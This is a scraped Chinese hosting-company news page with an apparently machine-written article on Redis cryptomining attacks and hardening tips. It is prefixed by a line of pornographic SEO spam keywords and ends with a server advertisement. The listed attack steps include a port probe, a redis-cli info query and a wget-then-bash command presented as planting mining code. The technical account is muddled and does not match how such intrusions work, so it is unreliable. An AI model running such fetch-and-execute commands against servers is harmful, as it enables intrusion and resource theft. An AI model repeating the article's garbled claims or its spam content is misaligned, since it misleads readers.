日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
Redis漏洞挖礦黑客攻擊竊取越來越多(redis漏洞挖礦程序)

Redis漏洞挖礦:黑客攻擊竊取越來越多

Redis是一個(gè)開源的內(nèi)存數(shù)據(jù)結(jié)構(gòu)存儲(chǔ)系統(tǒng),被廣泛應(yīng)用于 Web 緩存、分布式會(huì)話、消息隊(duì)列等場(chǎng)景中。隨著 Redis 應(yīng)用的普及,其也成為了黑客攻擊的目標(biāo)之一。近期,國(guó)內(nèi)外多個(gè)機(jī)構(gòu)相繼發(fā)布 Redis 漏洞挖礦事件的報(bào)告,黑客利用 Redis 漏洞進(jìn)行挖礦,竊取大量的計(jì)算機(jī)性能資源及個(gè)人信息數(shù)據(jù)。

Redis 漏洞原理

Redis 漏洞產(chǎn)生的原因,主要是基于Redis默認(rèn)情況下會(huì)綁定所有IP地址,開放6379端口,未加安全驗(yàn)證功能,同時(shí)在官方文檔也沒有強(qiáng)調(diào)安全措施的必要性,因此在網(wǎng)絡(luò)上早期就被揭示出其“危險(xiǎn)性”。

黑客利用漏洞的過程,可以簡(jiǎn)單分為以下幾步:

1. 探測(cè)VPS服務(wù)器是否有Redis服務(wù)及其版本。

telnet IP地址(如:127.0.0.1) Redis端口(默認(rèn)6379)

2. 掃描Redis信息,獲取Redis的密碼及版本等信息。

echo info|redis-cli -h IP地址 -a Redis密碼 -p 端口

3. 注入挖礦代碼,同步進(jìn)行挖礦操作。

wget  http://download.bt.cn/tools/redis_mgr.sh && bash redis_mgr.sh

經(jīng)過漏洞攻擊之后,被攻擊的Redis服務(wù)會(huì)開始進(jìn)行挖礦操作,損耗 CPU 計(jì)算能力,嚴(yán)重到會(huì)導(dǎo)致機(jī)器癱瘓,可能會(huì)被徹底破壞或受到不可逆的損害。

如何防止Redis漏洞攻擊

針對(duì)Redis漏洞攻擊的實(shí)戰(zhàn)解決方案,推薦以下幾個(gè)建議:

1. 合理設(shè)置Redis訪問密碼:由于Redis服務(wù)器綁定了所有IP地址,因此設(shè)置訪問密碼是 Redis 服務(wù)器安全保護(hù)重要措施。修改文件/etc/redis.conf,在文件結(jié)尾添加requirepass密碼,即可完成密碼訪問驗(yàn)證配置。

2. 使用Redis的最新版本:Redis的個(gè)別版本存在安全漏洞,如Redis 3.0.6/3.0.7版本等,因此Redis使用者可以在 官網(wǎng)(https://redis.io/download)上下載最新的安全版本,避免被攻擊威脅。

3. 合理開啟一些防御措施:在Redis的配置文件中開啟不同的應(yīng)用場(chǎng)景的配置文件選項(xiàng),如限制內(nèi)存使用、禁用命令等功能,增強(qiáng)Redis服務(wù)的安全性和保護(hù)能力。

4. 提高Redis服務(wù)初始安裝時(shí)的安全性設(shè)置:可直接使用Redis安裝包進(jìn)行安裝,然后隨著業(yè)務(wù)發(fā)展和安全考慮,為 Redis 重新配置日志記錄、網(wǎng)絡(luò)安全、SSL/TLS 組件等信息,并加強(qiáng) Redis 的訪問權(quán)限。

結(jié)論

針對(duì) Redis 漏洞挖礦的攻擊事件,要充分認(rèn)識(shí) Redis 服務(wù)安全保護(hù)的必要性,以更高效、更規(guī)范的方法加強(qiáng) Redis 服務(wù)的安全性能,在日常運(yùn)維中定期監(jiān)控 Redis 服務(wù)的運(yùn)行狀況、升級(jí)最新版本,提高服務(wù)安全性和保護(hù)能力,在保障用戶數(shù)據(jù)安全的同時(shí),保障自身安全完整性。

創(chuàng)新互聯(lián)(cdcxhl.com)提供穩(wěn)定的云服務(wù)器,香港云服務(wù)器,BGP云服務(wù)器,雙線云服務(wù)器,高防云服務(wù)器,成都云服務(wù)器,服務(wù)器托管。精選鉅惠,歡迎咨詢:028-86922220。


網(wǎng)站題目:Redis漏洞挖礦黑客攻擊竊取越來越多(redis漏洞挖礦程序)
文章來源:http://www.dlmjj.cn/article/cocispi.html